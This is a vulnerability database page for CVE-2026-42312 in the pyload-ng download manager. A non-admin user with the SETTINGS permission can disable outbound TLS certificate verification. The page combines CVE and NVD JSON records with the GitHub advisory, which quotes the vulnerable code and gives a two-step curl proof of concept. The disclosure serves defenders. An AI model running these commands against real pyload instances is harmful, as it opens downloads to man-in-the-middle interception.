Vulnerability-Lookup

CVE-2026-42312 (GCVE-0-2026-42312)

Vulnerability from cvelistv5 – Published: 2026-05-11 16:32 – Updated: 2026-05-11 19:06

Title

pyload-ng: non-admin SETTINGS users can disable outbound TLS peer verification

Summary

pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option ("general", "ssl_verify") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.

Severity ?

6.8 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

CWE

CWE-295 - Improper Certificate Validation
CWE-306 - Missing Authentication for Critical Function
CWE-863 - Incorrect Authorization

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/pyload/pyload/security/advisor…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
pyload	pyload	Affected: < 0.5.0b3.dev100

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-42312",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-11T18:50:26.596458Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-11T19:06:12.697Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "pyload",
          "vendor": "pyload",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.5.0b3.dev100"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\"general\", \"ssl_verify\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 \u2014 TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-295",
              "description": "CWE-295: Improper Certificate Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-306",
              "description": "CWE-306: Missing Authentication for Critical Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-863",
              "description": "CWE-863: Incorrect Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-11T16:32:00.329Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9"
        }
      ],
      "source": {
        "advisory": "GHSA-ccxc-x975-4hh9",
        "discovery": "UNKNOWN"
      },
      "title": "pyload-ng: non-admin SETTINGS users can disable outbound TLS peer verification"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42312",
    "datePublished": "2026-05-11T16:32:00.329Z",
    "dateReserved": "2026-04-26T12:37:18.169Z",
    "dateUpdated": "2026-05-11T19:06:12.697Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-42312",
      "date": "2026-05-17",
      "epss": "0.0002",
      "percentile": "0.05504"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42312\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-11T18:16:34.833\",\"lastModified\":\"2026-05-15T14:09:19.303\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\\\"general\\\", \\\"ssl_verify\\\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 \u2014 TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":6.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.6,\"impactScore\":5.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":6.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.6,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-295\"},{\"lang\":\"en\",\"value\":\"CWE-306\"},{\"lang\":\"en\",\"value\":\"CWE-863\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.5.0b3.dev100\",\"matchCriteriaId\":\"52EF3B80-A96B-4C56-AD17-7FB44B65A2C3\"}]}]}],\"references\":[{\"url\":\"https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"pyload-ng: non-admin SETTINGS users can disable outbound TLS peer verification\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-295\", \"lang\": \"en\", \"description\": \"CWE-295: Improper Certificate Validation\", \"type\": \"CWE\"}]}, {\"descriptions\": [{\"cweId\": \"CWE-306\", \"lang\": \"en\", \"description\": \"CWE-306: Missing Authentication for Critical Function\", \"type\": \"CWE\"}]}, {\"descriptions\": [{\"cweId\": \"CWE-863\", \"lang\": \"en\", \"description\": \"CWE-863: Incorrect Authorization\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"NONE\", \"baseScore\": 6.8, \"baseSeverity\": \"MEDIUM\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9\"}], \"affected\": [{\"vendor\": \"pyload\", \"product\": \"pyload\", \"versions\": [{\"version\": \"\u003c 0.5.0b3.dev100\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-11T16:32:00.329Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\\\"general\\\", \\\"ssl_verify\\\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 \\u2014 TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.\"}], \"source\": {\"advisory\": \"GHSA-ccxc-x975-4hh9\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42312\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-11T18:50:26.596458Z\"}}}], \"references\": [{\"url\": \"https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-11T18:50:43.772Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-42312\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-04-26T12:37:18.169Z\", \"datePublished\": \"2026-05-11T16:32:00.329Z\", \"dateUpdated\": \"2026-05-11T19:06:12.697Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-CCXC-X975-4HH9

Vulnerability from github – Published: 2026-05-04 22:07 – Updated: 2026-05-13 14:17

Summary

pyload-ng: non-admin SETTINGS users can disable outbound TLS peer verification via unrestricted `ssl_verify` config (incomplete fix for CVE-2026-33509 / -35463 / -35464 / -35586)

Details

Summary

The set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option ("general", "ssl_verify") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches.

This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist.

Details

Writer — src/pyload/core/api/__init__.py, set_config_value() (around lines 215–290). The function is decorated with @permission(Perms.SETTINGS) and only rejects writes when (category, option) appears in ADMIN_ONLY_CORE_OPTIONS:

ADMIN_ONLY_CORE_OPTIONS = {
    ("general", "storage_folder"),
    ("log", "syslog_host"), ("log", "syslog_port"),
    ("proxy", "password"), ("proxy", "username"),
    ("reconnect", "script"),
    ("webui", "host"),
    ("webui", "ssl_certfile"), ("webui", "ssl_keyfile"), ("webui", "ssl_certchain"),
    ("webui", "use_ssl"),
}
...
if (category, option) in ADMIN_ONLY_CORE_OPTIONS and not is_admin:
    self.pyload.log.error(...); return
self.pyload.config.set(category, option, value)

("general", "ssl_verify") is absent. config.set() in src/pyload/core/config/parser.py:329 calls cast() which has no branch for enum-string types — "off" is stored verbatim and persisted to disk via self.save().

Reader — src/pyload/core/network/request_factory.py:109-110:

def get_options(self):
    return {
        "interface": self.iface(),
        "proxies":   self.get_proxies(),
        "ipv6":      self.pyload.config.get("download", "ipv6"),
        "ssl_verify": self.pyload.config.get("general", "ssl_verify"),
        ...
    }

Sink — src/pyload/core/network/http/http_request.py:193-206:

if "ssl_verify" in options:
    aiachaser_on = b"on (using aia-chaser)"
    if options["ssl_verify"] in [True, b"on", aiachaser_on]:
        ...
        ssl_verify = 1
    else:
        ssl_verify = 0
    self.c.setopt(pycurl.SSL_VERIFYPEER, ssl_verify)
    self.c.setopt(pycurl.SSL_VERIFYHOST, ssl_verify * 2)

Because get_options() is invoked every time a new pycurl handle is built, the new config value takes effect on the very next outbound request — no pyload restart required.

PoC

Authenticated as any user who has Perms.SETTINGS but is not admin (e.g. a user with Role.USER + the SETTINGS permission bit):

# 1) Log in as the SETTINGS (non-admin) user.
curl -c cookies.txt -X POST http://pyload.example:8000/api/login \
    -d 'username=settings_user&password=<password>'

# 2) Disable TLS verification for all outbound downloads.
curl -b cookies.txt -X POST http://pyload.example:8000/api/setConfigValue \
    -d 'category=general&option=ssl_verify&value=off&section=core'
# -> 200 OK. Config persisted.

# 3) Enqueue any HTTPS download. An on-path attacker (shared LAN,
#    compromised upstream router, DNS hijack, or a malicious proxy
#    enabled via the sibling advisory on the proxy.* options) can
#    now present a forged cert for any target — pyload accepts it.

Verification: observe pycurl SSL_VERIFYPEER=0 in a debug build, or confirm that a download from an HTTPS endpoint served with a self-signed / mismatched cert succeeds after step 2 and fails before it.

Impact

Who: any authenticated user whose role was granted Perms.SETTINGS. In multi-user pyload deployments that delegate settings administration to non-admins, this is an unintended privilege escalation from "can change UI/download settings" to "can silently disable TLS cert validation for all outbound fetches".
What:
1. Man-in-the-middle on all HTTPS downloads, captcha fetches, update checks, and plugin HTTP calls.
2. Extends the impact of the already-published SSRF chain (CVE-2026-33992 / CVE-2026-35459). The URL-hostname validation those patches added is only meaningful if the TLS channel authenticates the endpoint; with ssl_verify=off, an on-path attacker can present forged certs for already-validated hosts — so HTTPS cloud-metadata endpoints and internal HTTPS services behind the host allowlist become reachable again.
3. Silent to the admin. Every adjacent security-critical option (proxy.password, SSL certfile/keyfile/certchain, use_ssl) is already admin-only, so the admin's mental model is that TLS policy cannot be weakened by a non-admin.
Not impacted: unauthenticated attackers; users holding only DOWNLOAD / LIST roles.

Severity ?

6.8 (Medium)


                  
                    CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.5.0b3.dev99"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.0b3.dev100"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42312"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295",
      "CWE-306",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T22:07:24Z",
    "nvd_published_at": "2026-05-11T18:16:34Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe `set_config_value()` API method (`@permission(Perms.SETTINGS)`) in `src/pyload/core/api/__init__.py` gates security-sensitive options behind a hand-maintained allowlist `ADMIN_ONLY_CORE_OPTIONS`. The option `(\"general\", \"ssl_verify\")` is **not** on that allowlist. Any authenticated user with the non-admin `SETTINGS` permission can set `general.ssl_verify = off`, and every subsequent outbound pycurl request is made with `SSL_VERIFYPEER=0` and `SSL_VERIFYHOST=0` \u2014 TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches.\n\nThis is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist.\n\n### Details\n\n**Writer** \u2014 `src/pyload/core/api/__init__.py`, `set_config_value()` (around lines 215\u2013290). The function is decorated with `@permission(Perms.SETTINGS)` and only rejects writes when `(category, option)` appears in `ADMIN_ONLY_CORE_OPTIONS`:\n\n```python\nADMIN_ONLY_CORE_OPTIONS = {\n    (\"general\", \"storage_folder\"),\n    (\"log\", \"syslog_host\"), (\"log\", \"syslog_port\"),\n    (\"proxy\", \"password\"), (\"proxy\", \"username\"),\n    (\"reconnect\", \"script\"),\n    (\"webui\", \"host\"),\n    (\"webui\", \"ssl_certfile\"), (\"webui\", \"ssl_keyfile\"), (\"webui\", \"ssl_certchain\"),\n    (\"webui\", \"use_ssl\"),\n}\n...\nif (category, option) in ADMIN_ONLY_CORE_OPTIONS and not is_admin:\n    self.pyload.log.error(...); return\nself.pyload.config.set(category, option, value)\n```\n\n`(\"general\", \"ssl_verify\")` is absent. `config.set()` in `src/pyload/core/config/parser.py:329` calls `cast()` which has no branch for enum-string types \u2014 `\"off\"` is stored verbatim and persisted to disk via `self.save()`.\n\n**Reader** \u2014 `src/pyload/core/network/request_factory.py:109-110`:\n\n```python\ndef get_options(self):\n    return {\n        \"interface\": self.iface(),\n        \"proxies\":   self.get_proxies(),\n        \"ipv6\":      self.pyload.config.get(\"download\", \"ipv6\"),\n        \"ssl_verify\": self.pyload.config.get(\"general\", \"ssl_verify\"),\n        ...\n    }\n```\n\n**Sink** \u2014 `src/pyload/core/network/http/http_request.py:193-206`:\n\n```python\nif \"ssl_verify\" in options:\n    aiachaser_on = b\"on (using aia-chaser)\"\n    if options[\"ssl_verify\"] in [True, b\"on\", aiachaser_on]:\n        ...\n        ssl_verify = 1\n    else:\n        ssl_verify = 0\n    self.c.setopt(pycurl.SSL_VERIFYPEER, ssl_verify)\n    self.c.setopt(pycurl.SSL_VERIFYHOST, ssl_verify * 2)\n```\n\nBecause `get_options()` is invoked every time a new pycurl handle is built, the new config value takes effect on the very next outbound request \u2014 no pyload restart required.\n\n### PoC\n\nAuthenticated as any user who has `Perms.SETTINGS` but is **not** admin (e.g. a user with `Role.USER` + the SETTINGS permission bit):\n\n```bash\n# 1) Log in as the SETTINGS (non-admin) user.\ncurl -c cookies.txt -X POST http://pyload.example:8000/api/login \\\n    -d \u0027username=settings_user\u0026password=\u003cpassword\u003e\u0027\n\n# 2) Disable TLS verification for all outbound downloads.\ncurl -b cookies.txt -X POST http://pyload.example:8000/api/setConfigValue \\\n    -d \u0027category=general\u0026option=ssl_verify\u0026value=off\u0026section=core\u0027\n# -\u003e 200 OK. Config persisted.\n\n# 3) Enqueue any HTTPS download. An on-path attacker (shared LAN,\n#    compromised upstream router, DNS hijack, or a malicious proxy\n#    enabled via the sibling advisory on the proxy.* options) can\n#    now present a forged cert for any target \u2014 pyload accepts it.\n```\n\nVerification: observe pycurl `SSL_VERIFYPEER=0` in a debug build, or confirm that a download from an HTTPS endpoint served with a self-signed / mismatched cert succeeds after step 2 and fails before it.\n\n### Impact\n\n- **Who**: any authenticated user whose role was granted `Perms.SETTINGS`. In multi-user pyload deployments that delegate settings administration to non-admins, this is an unintended privilege escalation from \"can change UI/download settings\" to \"can silently disable TLS cert validation for all outbound fetches\".\n- **What**:\n    1. Man-in-the-middle on all HTTPS downloads, captcha fetches, update checks, and plugin HTTP calls.\n    2. Extends the impact of the already-published SSRF chain (CVE-2026-33992 / CVE-2026-35459). The URL-hostname validation those patches added is only meaningful if the TLS channel authenticates the endpoint; with `ssl_verify=off`, an on-path attacker can present forged certs for already-validated hosts \u2014 so HTTPS cloud-metadata endpoints and internal HTTPS services behind the host allowlist become reachable again.\n    3. Silent to the admin. Every adjacent security-critical option (`proxy.password`, SSL certfile/keyfile/certchain, `use_ssl`) is already admin-only, so the admin\u0027s mental model is that TLS policy cannot be weakened by a non-admin.\n- **Not impacted**: unauthenticated attackers; users holding only `DOWNLOAD` / `LIST` roles.",
  "id": "GHSA-ccxc-x975-4hh9",
  "modified": "2026-05-13T14:17:42Z",
  "published": "2026-05-04T22:07:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42312"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-4744-96p5-mp2j"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-ppvx-rwh9-7rj7"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-w48f-wwwf-f5fr"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pyload-ng: non-admin SETTINGS users can disable outbound TLS peer verification via unrestricted `ssl_verify` config (incomplete fix for CVE-2026-33509 / -35463 / -35464 / -35586)"
}

FKIE_CVE-2026-42312

Vulnerability from fkie_nvd - Published: 2026-05-11 18:16 - Updated: 2026-05-15 14:09

Severity ?

6.8 (Medium) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
6.8 (Medium) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9	Exploit, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	pyload-ng_project	pyload-ng	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*",
              "matchCriteriaId": "52EF3B80-A96B-4C56-AD17-7FB44B65A2C3",
              "versionEndExcluding": "0.5.0b3.dev100",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\"general\", \"ssl_verify\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 \u2014 TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100."
    }
  ],
  "id": "CVE-2026-42312",
  "lastModified": "2026-05-15T14:09:19.303",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.6,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.6,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-05-11T18:16:34.833",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-295"
        },
        {
          "lang": "en",
          "value": "CWE-306"
        },
        {
          "lang": "en",
          "value": "CWE-863"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42312 (GCVE-0-2026-42312)

GHSA-CCXC-X975-4HH9

Summary

Details

PoC

Impact

FKIE_CVE-2026-42312

Tags

Sightings

Nomenclature